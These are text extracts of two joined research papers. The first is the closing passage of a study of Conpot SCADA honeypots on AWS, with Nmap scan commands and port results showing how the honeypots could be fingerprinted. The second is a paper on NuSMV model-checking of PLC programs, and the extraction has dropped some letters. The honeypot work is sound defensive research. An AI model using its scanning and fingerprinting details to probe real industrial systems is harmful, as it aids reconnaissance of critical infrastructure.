AMI folder for deployment. This image was then propagated to additional AWS deployment zones. After deploying the image twice in each zone (see Table I), the SCADA honeypots were booted and accessed via SSH to finalize their deployment. This material is based upon work sup ported by the U.S. National Science Foundation under Grant No. DUE-1303362 and SES-1314631. 978-1-5090-3865-7/16/$31.00 2016 IEEE 196 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:48 UTC from IEEE Xplore. Restrictions apply. An advantage to leveraging AWS is its key management and port security options. Each instance of the Conpot was set up to allow all ports to be accessible and to provide an accurate review of port inform ation when running any given honeypot template. Furthermore, the key pair options facilitated maintaining secure access to each instance. After obtaining the private key necessary to create a connection, each instance was generated using the same public key which allowed access using one private certificate combined with the instance password. After accessing each honeypot, the following command was utilized to start the Conpot with the designated template: sudo conpot --template [template name] If a template name is not selected, the default option of default is used. For the purpo ses of the honeypot analysis, an in-depth review of both the Guardian AST gas pump monitoring system and default Siemens S7-200 ICS was performed together with a brief analysis of the IPMI - 371 and Kamstrup 382 smart meter SCADA devices. B. AWS Deployment The following table summarizes the deployed Conpot honeypots by their location, IP address, and template details. The honeypots were deployed globally across AWS for future analysis into regional variations on attack frequency and type: TABLE I. AWS CONPOT DEPLOYMENT ZONE INFORMATION AWS Location Name IP Details us-east-1a Conpot1 52.23.225.126 Default template us-east-1a Conpot2 54.86.249.160 Emulation of gas tank level us-west-2b Conpot3 52.36.62.44 Default template us-west-2b Conpot4 52.32.45.32 Em ulation of gas tank level eu-west-1b Conpot5 52.30.167.154 Default template eu-west-1b Conpot6 52.19.95.69 Emulation of gas tank level ap-northeast-1c Conpot7 52.192.20.179 Default template ap-northeast-1c Conpot8 52.196.47.205 Emulation of gas tank level ap-southeast-1b Conpot9 54.254.141.38 Default template ap-southeast-1b Conpot10 54.254.140. 52 Emulation of gas tank level sa-east-1a Conpot11 54.207.96.59 Default template sa-east-1a Conpot12 54.232.248.38 Emulation of gas tank level III. DATA AND RESULTS A. Nmap Scan Data The security scanner Nmap was utilized to check the open ports after starting Conpot. Nmap was chosen as it is a mature, robust connection-oriented canning tool that is widely used and has broad support for many protocols. For initial comparison, a vanilla installation of Ubuntu was also deployed and scanned to show what ports are open by default. The following Nmap scanni ng commands were used: nmap -A -v [IP Address] nmap -A -v -Pn [IP Address] nmap -A -v -Pn -p- [IP Address] Nmap was used in a staged approach to show what different scanning techniques showed as the open port results (Tables II and III). The flag -A results in Nmap turning on version detection and other Advanced and Aggressive features (nmap.org). This scanning technique is intrusive and readily detected due to its aggr essive scanning and operation systems (OS) detection, but it provides a good representation of what to expect for identification. Using the -Pn resulted in Nmap suppressing pings when conducting scans to determine if a host is up. For the purposes of the analysis, the virtual machines were already known to be operational and in some cases their configurations reject ed pings. The -p- flag was also used to conduct a scan over the entire port range (ports 1-65535). Lastly, the flag -v (version detection) was used also, although it was later deemed not necessary, as the A flag already included version detection. TABLE II. N MAP SCANNING (UTILIZING FLAGS V AND A) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 80 80,102, 161, 502, 623, 47808 Guardian AST N/A 10001 IPMI N/A 623 Kampstrup Smart Meter N/A 1025, 50100 Scanning with the -v and -A flags resulted in no results from the Guardian AST, IPMI , and Kampstrup smart meter, due to pings being rejected by these SCADA configurations. The revelation of port 22 through a ping scan should allow an attacker to question whether the Siemens S7-200 emulator is a honeypot or an actual SCADA device. TABLE III. NMAP SCANNING (UTILIZING V, -A, AND -PN FLAGS ) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 25, 80, 514, 6009, 8443 80,102, 161, 502, 623, 47808 Guardian AST 22, 25, 514, 6004, 10001 10001 IPMI 22 623 Kampstrup Smart Meter 22, 25, 514, 1025, 1068 1025, 50100 After utilizing the -Pn flag to stop the ping option during scans, many more ports were identified across the various usable templates within Conpot. However most of these additional ports were not SCADA ports; for example, port 514 was for system logging, while many of the opened SCADA ports remained undetected. This indicates that Conpot installations running on Ubuntu appear to be very susceptible to having Ubuntu default services enabled and running across a multitude of ports that would not be available on a standard SCADA installation. As a final scan to compare against, all ports were scanned to determine what a full Nmap sc an would show as open port results (Table IV). On average the scans took around three to four hours to fully process due to the intensity of the scans. The wide range of additional open ports, including ports in the dynamic/private range of 49152-65536 (note: The Kampstrup Smart Meter statically assigns a port in this range) again calls into question the ability of a default Conpot installation that 197 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:48 UTC from IEEE Xplore. Restrictions apply. does not actively close all other port-opening Ubuntu services to masquerade as an actual SCADA device, if comprehensive port scanning is utilized, or even if repositories such as Shodan are. TABLE IV. N MAP SCANNING (UTILIZING V, A, PN, AND -P- FLAGS ) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 80, 102, 502, 514, 2000, 5060, 8008, 8020, 18556 80,102, 161, 502, 623, 47808 Guardian AST 22, 514, 2000, 3826, 5060, 8008, 8020, 10001, 11190, 19116, 36123, 43787, 48191, 63790 10001 IPMI 22, 2000, 5060, 8008, 8020 623 Kampstrup Smart Meter 22, 514, 1025, 2000, 4368, 5060, 8008, 32469, 50100, 52245, 57565 1025, 50100 Vanilla Ubuntu Install 22, 514, 2000, 5060, 8008, 8020, 38051, 38093, 47785 B. SHODAN Scan Data SHODAN data was also anal yzed to determine which ports it detected as open within the various Conpot templates. Shodan regularly scans the entire IPV4 internet address space and as such is a reliable indicator of what can be seen by third parties conducting reconnaissance scanning. Unfortunately, the IPMI and Kampstrup templates were never identified by SHODAN due to time constraints. TABLE V. SHODAN SCAN DATA RESULTS Honeypot Type SHODAN Port Scan Results Conpot Ports Siemens S7-200 22, 80, 102, 161 80,102, 161, 502, 623, 47808 Guardian AST 10001 10001 IPMI N/A 623 Kampstrup Smart Meter N/A 1025, 50100 C. Scan Data Discussion A very interesting finding in the Nmap scan data is that while the Guardian AST, Kampstrup, and IPMI devices all denied pings, the Siemens SIAMATIC S7-200 did not. When removing the ping option for the result set in Table III, the results were more comprehensive and revealing. In every scan result, port 22 was shown as open, which would be the case due to utilizing SSH to gain access to each honeypot via a terminal in Putty. When comparing what should have been seen as open ports for each respective template within Conpot to the results from Table III, Nmap failed to identify the following ports as open on their respective devices: Siemens S7-200: 102, 161, 502, 623, 47808 IPMI: 623 Kampstrup Smart Meter: 50100 However, these ports may not have been found due to not being part of the top 1,000 which Nmap commonly scans without being directed to scan each and every port. To that point, Nmap was eventually set to scan each and every port (Table IV). After scanning all ports, some ports that should have been open were still not found. The results are as follows for ports which were not found: Siemens S7-200: 161, 623, 47808 IPMI: 623 This requires further research. In the case of the Siemens device, SHODAN found port 161 and captured a banner from it, while Nmap did not detect it. What was more surprising during the full comprehensive scan was the large number of open ports that were not expected to be open at all within Table V. Due to the large variety of ports that were discovered to be open, the vanilla install of the Ubuntu image was deployed without running any Conpot template. Based on a scan of the vanilla Ubuntu, it appears that more ports were being opened than would be originally anticipated when running any given Conpot template. Further analysis will need to be conducted to determine which extra ports being opened might be indicative of a honeypot instead of an effective emulation. The results from the SHODAN scan were also very insightful in that they more accurately showed the Conpot instances as being SCADA devices . This is primarily because SHODAN focuses its scan results on a much smaller port set, which resulted in the results not showing the large number of open ports that were shown in the all-port scan of Nmap. The most intriguing finding here, as previously mentioned, is that SHODAN found port 161 open on the Siemens device, while Nmap did not. The banner grabbed by SHODAN also showed that the device was a Siemen s SIAMATIC S7-200 device. These findings may show that Nmap is indeed not fully effective in determining ports that are actually open. Unfortunately, at the time of this writing, SHODAN had not discovered the IPMI and Kampstrup devices, so a comparison of the SHODAN results of these devices with the Nmap port scans was not available. Additional future work includes evaluating the SCADA Honeynet Honeypot, analyzing SCADA honeypot attacks, and evaluating log analysis tools. Another future task, cloaking Honeypot signatures that could differentiate them from real SCADA devices then evaluating attack differentials, could help determine if honeypots are being identified. In conclusion, the devices accurately depicted SCADA ports, but appeared to have additional ports open that could reveal their identity as honeypots to sophisticated attackers. R EFERENCES [1] S. Wade. SCADA Honeynets: Th e attractiveness of honeypots as critical infrastructure security tools for the detection and analysis of advanced threats. Graduate Theses and Dissertations, Iowa State University, USA, 2011. [2] A. Serbanescu, S. Obermeir, and De r-Yeuan Yu. ICS Threat Analysis Using a Large-Scale Honeynet, in Proceedings of the 3rd International Symposium for ICS & SCADA Cyber Security Research 2015, 2015, 1-30. [3] D. Buza, F. Juhasz, and G. Miru. D esign and implementation of critical infrastructure protection system, Budapest University of Technology and Economics, Department of Netw orked Systems and Services, 2013. [4] D. Fronimos, E. Magkos, and V. Chrissikopoulos. Evaluating Low Interaction Honeypots and On their Use against Advanced Persistent Threats, in PCI '14, Proceedings of the 18th Panhellenic Conference on Informatics, Athens, Gr eece, October 2-4, 2014. 198 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:48 UTC from IEEE Xplore. Restrictions apply.
Efficient_representation_for_formal_verification_of_PLC_programs.pdf
This paper addresses scalability of model-checking using the NuSMV model-checker . T o avoid or at least limit combinatory explosion, an ef cient representation of PLC programs is proposed. This representation includes only thestates that are meaningful for properties proof. A method to translate PLC programs developed in Structured T ext into NuSMV models based on this representation is described andexempli ed on several examples. The results, state space size and veri cation time, obtained with models constructed using this method are compared to those obtained with previously published methods so as to assess ef ciency of the proposed representation. I. I NTRODUCTION Formal veri cation of PLC (Programmable Logic Con- trollers) programs thanks to model-checking tools has beenaddressed by many researchers ([1], [2], [3], [4], [5], [6],[7], [8]). These works have yielded formal semantics of theIEC 61131-3 standardized languages [9] as well as rules totranslate PLC programs into formal models that can be takenas inputs of model-checkers such as SMV [10] or UPPAAL[11]. Despite these valuable results, it is easy to observe that model-checking is not employed daily in companies thatdevelop PLC programs (see ([12]) for a comprehensive studyof logic design practices). Automation engineers prefer touse the traditional, while being tedious and not exhaustive,simulation techniques to verify that programs they have de-veloped ful ll the application requirements. Several reasonscan be put forward to explain this situation: specifying formalproperties in temporal logic or in the form of timed automatais an extremely tough task for most engineers; model-checkers provide, in case of negative proof, counterexamplesthat are dif cult to interpret; PLC vendors do not proposecommercial software able to translate automatically PLCprograms into formal models, ... All these dif culties are real and solutions must be found to overcome them, e.g. libraries of application-oriented prop-erties, explanations of counterexamples in suitable languages,automatic translation software. Nevertheless, in our view,the main obstacle to industrial use of formal veri cation iscombinatory explosion that occurs when dealing with large size control programs. Formal models that underlie model- checking are indeed discrete state models such as nite statemachines or timed automata. Even if properties are proved * This work was carried out in the frame of a research project funded by Alstom Power Plant Information and Control Systems, Engineering tools Department.symbolically, using binary decision diagrams (BDDs) for instance, existing methods produce, from industrial, largesize, PLC programs, models that include too many statesto be veri ed by the present model-checking tools. In thatcase, no proof can be obtained and formal veri cation is thenuseless. The aim of the research presented in this paper is to tackle out, or at least to lessen, this problem by proposing a transla-tion method that yields, from PLC programs, formal modelsfar smaller than those obtained with existing methods. Thesenovel models will include only the states that are meaning-ful for properties proof and then will be less sensitive tocombinatory explosion. This ef cient representation of PLCprograms will contribute to improve scalability of model-checkers and to favor their industrial use. This paper includes ve sections. Section 2 delineates the frame of our research. The principle of the translation methodis explained in section 3. Section 4 describes how ef cientNuSMV models can be obtained from PLC programs de-veloped in a standardized language thanks to this method,while section 5 presents experimental results. Prospects forextending these works are given in section 6. PLCs (Figure 1) are automation components that receive logic input signals coming from sensors, operators or otherPLCs and send logic output signals to actuators or othercontrollers. The control algorithms that specify the valuesof outputs according to the current values of inputs and the previous values of outputs are implemented within PLCs in programs written in standardized languages, such as LadderDiagram (LD), Structured Text (ST) or Instruction List (IL).These programs run under a real-time operating systemwhose scheduler may be multi- or mono-task. This paperfocuses only on mono-task schedulers. Given this restriction, a PLC performs a cyclic task, termed PLC cycle, that includes three steps : inputs reading, program execution,outputs updating. The period of this task may be constant(periodic scan) or may vary (cyclic scan). II. M ODEL -CHECKING OF LOGIC CONTROLLERS Previous works that have been carried out to check PLC programs properties by using existing model-checkers ad-dressed either timed ([4], [7]) or untimed ([1], [2], [3],[6], [8]) model-checking. Since our objective is to facilitateindustrial use of formal veri cation techniques by avoiding orlimiting combinatory explosion and that this objective seemsmore easily reachable for untimed systems, only untimedProceedings of the 8th InternationalWorkshop on Discrete Event SystemsAnn Arbor, Michigan, USA, July 10-12, 2006 TA2.2 1-4244-0053-8/06/$20.00 2006 IEEE 182 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. Fig. 1. PLC basic components model-checking will be considered in this paper. In what follows, all examples of formal models will use the syntax of the NuSMV model-checker [13], though similar resultswould be obtained with that of other model-checkers of thesame class. It matters also to point out that, given the kind ofsystems that are considered, periodic and cyclic tasks behavein the same fashion: PLC cycle duration is meaningless. Several approaches have been proposed to translate a PLC program into a formal untimed model. For room reasons,only two of them will be sketched below. [14] for instanceexpresses the semantics of each element (contact, coil,links,...) of LD in the form of a small state automaton.The formal behavior of a given program is then obtainedby composition of the different state automata that describeits elements. This method relies upon a detailed semanticsof ladder diagram and can be extended to programs writtenin several languages, but it gives rise easily to state spaceexplosion, even for rather small examples. A more ef cientapproach ([2], [6]) translates each program statement into aSMV next function. Each PLC cycle is then modeled by a sequence of states, the rst and last states being characterizedrespectively by the values of input-output variables at theinput reading and output updating steps, the intermediarystates by the values of these variables after execution of eachstatement. Figure 2 illustrates this method on a didactic example written in ST. Thorough this paper, PLC programs exampleswill be given in ST. ST is a a textual language, similarto PASCAL, but tailor-made for automation engineers, forit includes statements to invoke and to use the outputs ofFunction Blocks (FB) such as RS (SR) - reset (set) dominantmemory -, RE (FE) - rising (falling) edge. This languageis advocated for the control systems of power plants thatare targeted in the project. Equivalent programs in othersequentially executed languages, like programs written in ILor LD, can be obtained without dif culty. The program presented in Figure 2 includes four state- ments: two assignments followed by one IF selection and one assignment. From this program, it is possible to obtainby using the previous method (translation of each statementinto a SMV next function) an execution trace whose part is shown on Figure 2, assuming that the values of the variablesin the initial state (de ned when setting up the controller) and the values of the input variables at the inputs reading steps of the rst and second PLC cycles are respectively: Initial values of variables: I1=1,I2=0,I3=1, I4=0,O1=0,O2=0,O3=0 and O4=1 Input variables values at the beginning of the rst PLC cycle: I1=0,I2=0,I3=1 and I4=1 Input variables values at the beginning of the second PLC cycle: I1=1,I2=1,I3=0 and I4=1 It matters to highlight that the values of input variables remain constant in all the states of one PLC cycle. Fig. 2. A simple program and part of the resulting trace with the method presented in [6] In addition to the formal model of the controller, model- checkers need a set of formal properties to prove. Two kindsof properties are generally considered: Intrinsic properties, such as absence of in nite loop,no deadlock, ..., which refer to the behavior of thecontroller independently of its environment; Extrinsic properties which refer to the behavior of inputsand outputs, e.g. commission of outputs for a givencombination of inputs, always forbidden combinationof outputs, allowed sequences of inputs-outputs,... This paper focuses only on extrinsic properties. Referring to outputs behavior, these properties impact indeed directlysafety and dependability of the controlled process and thenare more crucial. If one of them (or several) are not satis ed,hazardous events may occur, leading to signi cant failures. If focus is put on extrinsic properties veri cation, the two approaches described above lead to state automata withnumerous states that are not meaningful. It can be seen indeed on Figure 2 that the intermediary states de ned for each statement are not useful in that case; extrinsic properties 183 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. are related only to the values of input-output variables when updating the outputs, i.e. at the end of the PLC cycle. A similar reasoning may be done for the other method. Hence ef cient representation for formal veri cation will include only the states describing the values of input-outputvariables when updating outputs (shaded states in Figure 2).This representation may be obtained directly from a PLC pro-gram by applying the method whose principle is explainedin the next section. III. M ETHOD PRINCIPLE A. Assumptions In what follows it is assumed that: PLC programs are executed sequentially; only Boolean variables are used; internal variables may be included in the program; only the Boolean operators de ned in IEC 61131-3 standard (NOT, AND, OR, XOR) are allowed; only the following statements of ST language are al-lowed: assignment, function and function block (FB)control statements, IF and CASE selection statements;iteration statements (FOR, WHILE, REPEAT) are for-bidden; multiple assignments of the same variable are possible; Boolean FBs, such as set and reset dominant memoriesde ned in the standard or FBs that implement appli-cation speci c control rules, like actuators starting orshutting down sequences, may be included in a program. The rst two assumptions are simple and can be made for programs in ST, LD or IL. The third assumption meansthat a program computes the values of internal and output variables from those of input variables and of computed (internal and output) variables; this allows us to considerinternal variables in the same way as outputs in what follows.The fourth and fth ones apply only to ST programs butsimilar assumptions for LD or IL programs can be easily drawn up. Iterations are forbidden because they can lead to too long cycle times that do not comply with real-timerequirements. The sixth assumption may be puzzling, forcontrary to the usual programming rule that advocates thateach variable must be assigned only once. Even if thisprogramming rule is helpful when developing a softwaremodule from scratch, this assumption must be introducedto cope with industrial PLC programs in which it is quiteusual to nd multiple assignments of the same variable.Two reasons can be put forward to explain this situation.First industrial PLC programs are often developed fromprevious similar ones; then programs designers copy and paste parts of previous programs in the new program. This reuse practice may lead to assign one variable several times.Second a ST program may contain both normal assignmentsand assignments included within selection statements; thisis an other reason that explains multiple assignments. Asour objective is to proof properties on existing programs, without modifying them prior to veri cation, this speci c feature must be taken into account. It will be shown belowthat multiple assignments do not impede to construct ef cient representation. Figure 3 outlines the translation method that has been developed to obtain ef cient representation of PLC programs.As shown on this gure, this method includes two main steps:static analysis of the program and generation of the NuSMVmodel that describes formally the behavior of the programwith regards to its inputs-outputs. Fig. 3. Method overview B. Static analysis Static analysis is aiming at deriving, from the PLC pro- gram, dependency relations between variables. Starting fromthe initial values of input and output variables that are xedduring set up, for each PLC cycle, the values of outputvariables are computed either only from values of inputvariables or from values of input variables and values of otheroutput variables. In the rst case, the value of each outputvariable at the end of PLC cycle i+1 (i: positive integer) isobtained merely from values of input variables for this cycle.In the second case, computation of the value of one outputvariable must use the values of output variables for this cycleif the last assignment of these output variables is locatedupstream in the program, or the values of output variablesat the previous PLC cycle (cycle i) if those variables areassigned downstream; this computation will use obviouslythe values of input variables for cycle i+1. Hence, the mainobjective of static analysis is to determine, for each outputvariable, whether the value of each variable involved incomputation of the value of this output variable at PLC cyclei+1 is related to PLC cycle i+1 or to PLC cycle i. Static analysis is exempli ed on the program given in Figure 4. This ST program computes the values of ve outputvariables ( O 1, ..., O5) from those of four input variables ( I1, ..., I4) and includes only allowed statements. Some speci c features of this example are to be highlighted: the IF statement does not specify the value of O3if the condition following the IF is not true; this is allowed inST language and means that the value of O 3remains the same when this condition is false; the assignment of O4uses the output of a RS (reset dominant memory) FB; one output variable ( O1) is assigned twice. Scanning sequentially the program from top to bottom, statement by statement, static analysis yields dependencyrelations represented graphically in Figure 5 a). In this gure, 184 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. an arrow from variable X to variable Y means that the value of Y depends on the value of X (or that the value of X is used to compute the value of Y). Each statement gives rise to one dependency relation. For instance, the dependency relationobtained from the rst statement means that the value of O 1 depends on the values of I1and I2, the third relation that the value of O3is computed from the values of I3,I4,O1, and O3itself (in case of false condition), the fourth relation that the value of O4is computed from the values of I1,O5, and O4itself (if the two inputs of a memory are false, the output stays in its previous state),.... From this rst set ofrelations, it is then possible to build an other set of moredetailed relations such as: there is only one dependency relation for each outputvariable (multiple assignments are removed); dependency relations are developed, if possible; the value of each output variable Oj(j: positive integer) at PLC cycle i+1, noted Oj,i+1, is obtained from values of input variables for this cycle, noted Ik,i+1(k: positive integer), and from values of output variables for thiscycle ( O j,i+1) or for the previous one ( Oj,i). This second set of relations is presented in Figure 5b). Only the relation coming from the latter assignment of O1has been kept. The rst relation of the previous relations set has nevertheless permitted to obtain the nal dependency relationofO 3: the value of this variable at cycle i+1 is obtained from the values of I1,I2,I3,I4for cycle i+1 and the value of O3 at cycle i. The computation of the value of O4at cycle i+1 uses the value of O5at cycle i for this variable is assigned after O4in the program whilst the value of O5at cycle i+1 is computed from the values of O2and O4at this same cycle because these two variables have been assigned upstream inthe program. This set of dependency relations involving the values of output variables for two successive PLC cycles permits to translate ef ciently PLC programs into NuSMV models asexplained in the next section. O1:=I1OR I 2; O2:=I3AND I 4; IF O 1 THEN O3:=I3AND NOT (I4); END IF; O4:=RS (O5,I1) O5:=O2AND O 4; O1:=NOT (I2OR I 4); Fig. 4. PLC program example IV . T RANSLATING STPROGRAMS INTO NUSMV MODELS It is assumed in this section that the reader has a basic knowledge of the model-checker NuSMV; readers who wantto know more on this proof tool can refer to [13]. To checka system, NuSMV takes as input a transition relation thatspecify the behavior of a Finite State Machine (FSM) whichis assumed to represent this system. The transition relation of the FSM is expressed by de ning the values of variables in Fig. 5. Dependency relations obtained by static analysis. a) ordered intermediate relations; b) nal relations the next state (i.e. after each transition), given the values of variables in the current state (i.e. before the transition) and isdescribed in a declarative form as a set of assignments. Eachassignment de nes the next value of one variable from anexpression that includes operands that are values of variablesin the next or in the current state, and operators. As onlyBoolean variables are used in this study, the only Booleanoperators NOT, AND, OR, noted respectively !,& , |will be employed below. A. Translation algorithm Each ST statement that gave rise to one of the nal depen- dency relations is translated into one NuSMV assignment; then useless ST statements (assignments that are cancelled by other upstream assignments) are not translated. The setof useful statements is noted Prin what follows. The values of the variables within one assignment are obtained from thecorresponding dependency relation. If the value of a variablein this relation is that at PLC cycle i+1, then the next value of this variable will be introduced in the corresponding NuSMV assignment, using the next function; if the dependency relation mentions the value at cycle i, then the correspondingNuSMV assignment will employ the current value of thevariable. Given these translation rules, the translation algorithm described Figure 6 has been developed. This algorithm yieldsa NuSMV model from a set of statements Prissued from a PLC program. 185 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. BEGIN PLC prog TONuSMV model( Pr) FOR each statement SiofPr: IFSiis an assignment ( Vi:=expression i) THEN FOR each variable Vkinexpression i: Replace Vkby the variable pointed out in the dependency graph ( Vk,iorVk,i+1) ELIF Siis a conditional structure (if cond ; then stmt 1; else stmt 2) FOR each variable Vkincond : Replace Vkby the variable pointed out in the dependency graph ( Vk,iorVk,i+1) FOR each variable Vmassigned in Si: Replace Vmassignment by: case cond : assignment of Vmin PLC prog TONuSMV model( stmt 1)/follows; !cond : assignment of Vmin PLC prog TONuSMV model( stmt 2)/follows; esac ; Fig. 6. Translation algorithm B. Taking into account Function Blocks If a ST assignment includes an expression involving a Boolean Function Block (FB), the behavior of this FB mustbe detailed in the corresponding NuSMV assignment. Hencea library of generic models describing in NuSMV syntaxthe behavior of the usual FBs has been developed. Whentranslating ST assignments that include instances of FBs, instances of these generic models will be introduced into theNuSMV assignments. The RS (reset dominant memory) FB, for instance, has two inputs, noted Set and Reset, and oneoutput Q. Its behavior is recalled below: If Reset is true, then Q is false; If Set is true and Reset false, then Q is true; If none of the inputs is true, then Q keeps its previousvalue. This FB can be translated into the generic following NuSMV case...esac structure, sequentially executed. Next (Q): = case Reset :0 ; Set :1 ; 1: Q; esac ; C. Example Next (I1): ={0,1}; Next (I2): ={0,1}; Next (I3): ={0,1}; Next (I4): ={0,1}; Next (O2): = Next (I3)& Next (I4); Next (O3): = case Next (I1)|Next (I2): Next (I3)&! ( Next (I4)); !(Next (I1)|Next (I2)) : O3; esac ; Next (O4): = case Next (I1):0 ; O5:1 ; 1: O4; esac ; Next (O5): = Next (O2)& Next (O4); Next (O1): = ! ( Next (I2)|Next (I4)); Fig. 7. NuSMV model of the program presented in Figure 4Using the algorithm of Figure 6, the NuSMV model presented in Figure 7 can be obtained from the program of the previous section. It matters to emphasize that the translation algorithm does not introduce auxiliary variables, such as line counter, endof cycle, unlike the method proposed in [6]. It remainsnevertheless to assess the ef ciency of this representation. V. A SSESSMENT OF THE REPRESENTATION EFFICIENCY Several experiments have been carried out to assess ef- ciency of the representation proposed in this paper. To facilitate these experiments, an automatic translation program based on the method presented in the previous sections hasbeen developed. A. First experiment The objective of this experiment was to compare, on the simple example of Figure 4, the sizes of the state spacesof the NuSMV models obtained with the representationproposed in [6], i.e. direct translation of each statement ofthe PLC program into one NuSMV assignment, and withthat presented in this paper. Reachable states System diameter representation of [6] 314 out of 14336 22 proposed representation 21 out of 512 2 TABLE I STATE SPACE SIZES OF THE PROGRAM PRESENTED IN FIGURE 4 The two NuSMV models have been rst compared, using behavioral equivalence techniques, so as to verify that theybehave in the same manner. This comparison gave a positiveresult: the sequence of outputs generated by the two modelsis the same whatever the sequence of inputs. Then the sizes of their state spaces have been computed, using the NuSMVforward check function, as shown in Table I. This table contains, for each representation, the number of reachablestates among the possible states, e.g. 314 among 14336means that 314 states are really reachable among the 14336possible, as well as the system diameter: minimum number ofiterations of the NuSMV model to obtain all the reachablestates. These results shows clearly that, even for a simpleexample, the proposed representation reduces the size of thestate space by roughly one order of magnitude. B. Second experiment The second experiment was aiming at assessing the gains in time and in memory size, if any, due to the new rep-resentation when proving properties. This experiment hasbeen performed using the test-bed example presented in [6]: controller of a Fischertechnik system, for which numerical results were already available. Once again two models havebeen developed and the same properties have been checkedon both. Table II gives duration and memory consumption ofthe checking process for two properties. These results were obtained by using NuSMV , version 2.3.1, on a PC P4 3.2GHz, with 1 GB of RAM, under Windows XP. 186 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply. representation of [6] proposed representation liveness property 5h / 526MB 2s / 8MB safety property 20min / 200MB 2s / 8MB TABLE II TIME AND MEMORY REQUIRED FOR PROPERTIES VERIFICATION This experiment shows that the proposed representation reduces signi cantly the veri cation time and the mem-ory consumption. The ratio between the veri cation timesobtained with the two representations, for instance, varies between 9000 and 600, depending on the property. Similarresults are obtained with the other properties. C. Third experiment This third experiment has been performed with industrial programs developed for the control of a thermal power plant.The control system of this plant comprises 175 PLCs con-nected by networks. All the programs running on these PLCshave been translated as explained previously. The objective ofthis experiment was merely to assess the maximum, mediumand minimum sizes of the state spaces of the models obtainedfrom this set of industrial programs when using the proposedrepresentation. These values are given on the fourth line ofTable III. Even if the sizes of the state spaces are verydifferent, this experiment shows clearly the possibility oftranslating real PLC programs without combinatory explo-sion. Moreover these state spaces can be explored by themodel-checker in a reasonable time, a mandatory conditionfor checking properties; only 8 seconds are necessary indeedto explore all the state spaces of these programs. A secondaryresult is given at the last line of this table; the translationtime, time necessary to obtain from the set of programs a setof NuSMV models in the presented representation complieswith engineering constraints; translation of one PLC programinto one NuSMV model will not slow down PLC programdesign process. Number of programs 175 Output variables max:47 min:1 sum:1822 Input variables max:50 min:2 sum:2329 State space size of each program max:8.1028min: 105mean:5.1026 Strutation time of all state spaces 8 sec Whole time for translation 50 sec TABLE III RESULTS FOR A SET OF INDUSTRIAL PROGRAMS Even if it is not possible to obtain from these three experiments de nitive numerical conclusions, such as statespace reduction rate, veri cation time improvement ratio, ...they have allowed to illustrate the bene ts of the proposedrepresentation on a large concrete example, coming fromindustry. VI. C ONCLUSION The representation of PLC programs proposed in this pa- per can contribute to favor dissemination of model-checkingtechniques, for it enables to lessen strongly state space explosion problems and to reduce veri cation time. The examples given in the paper were written in ST language. Nevertheless programs written in LD or in IL languagescan be represented in the same manner; the principle of thetranslation method is the same, only the translation rules ofstatements are to be modi ed. Ongoing works concern an extension of this representation to take into account integer variables and the developmentof a similar representation for timed model-checking. R EFERENCES [1] I. Moon, Modeling programmable logic controllers for logic veri ca- tion, in Control Systems Magazine, IEEE . IEEE Comp. Soc. Press, 1994, pp. 53 59. [2] M. Rausch and B. Krogh, Formal veri cation of PLC programs, in Proc. of American Control Conference , June 1998, pp. 234 238. [3] R. Huuck, B. Lukoschus, and N. Bauer, A model-checking approach to safe SFCs, in Proc. of CESA 2003 , July 2003. [4] B. Zoubek, Automatic veri cation of temporal and timed properties of control programs, Ph.D. dissertation, University of Birmingham, 2004. [5] G. Frey and L. Litz, Formal methods in PLC programming, in Proc. of the IEEE SMC 2000 , October 2000, pp. 2431 2436. [6] O. de Smet and O. Rossi, Veri cation of a controller for a exible manufacturing line written in ladder diagram via model-checking, inAmerican Control Conference, ACC 02 , May 2002, pp. 4147 4152. [7] H. Bel Mokadem, B. B erard, V . Gourcuff, J.-M. Roussel, and O. de Smet, Veri cation of a timed multitask system with Uppaal, in Proc. of ETF A 05 . Catania, Italy: IEEE Industrial Electronics Society, Sept. 2005, pp. 347 354. [8] F. Jim enez-Fraustro and E. Rutten, A synchronous model of IEC 61131 PLC languages in SIGNAL. in ECRTS , 2001, pp. 135 142. [9] IEC Standard 61131-3 : Programmable controllers - Part 3 , IEC (International Electrotechnical Commission), 1993. [10] K. L. McMillan, The SMV Language , Cadence Berkeley Labs, http://www-cad.eecs.berkeley.edu/ kenmcmil/language.ps. [11] J. Bengtsson, K. Larsen, F. Larsson, P. Pettersson, and W. Yi, UP- PAAL a tool suite for automatic veri cation of real-time systems, inProc. Workshop Hybrid Systems III: V eri cation and Control, New Brunswick, NJ, USA, Oct. 1995 , ser. Lecture Notes in Computer Science, vol. 1066. Springer, 1996, pp. 232 243. [12] M. R. Lucas and D. M. Tilbury, A study of current logic design practices in the automotive manufacturing industry, Int. J. Hum.- Comput. Stud. , vol. 59, no. 5, pp. 725 753, 2003. [13] A. Cimatti, E. Clarke, E. Giunchiglia, F. Giunchiglia, M. Pistore, M. Roveri, R. Sebastiani, and A. Tacchella, NuSMV Version 2: An OpenSource Tool for Symbolic Model Checking, in Proc. Interna- tional Conference on Computer-Aided V eri cation (CA V 2002) , ser. LNCS, vol. 2004. Copenhagen, Denmark: Springer, July 2002. [14] O. Rossi, Validation formelle de programmes ladder diagram pour automates programmables industriels (formal veri cation of PLC pro-gram written in ladder diagram), Ph.D. dissertation, ENS de Cachan, 2003. 187 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:09 UTC from IEEE Xplore. Restrictions apply.
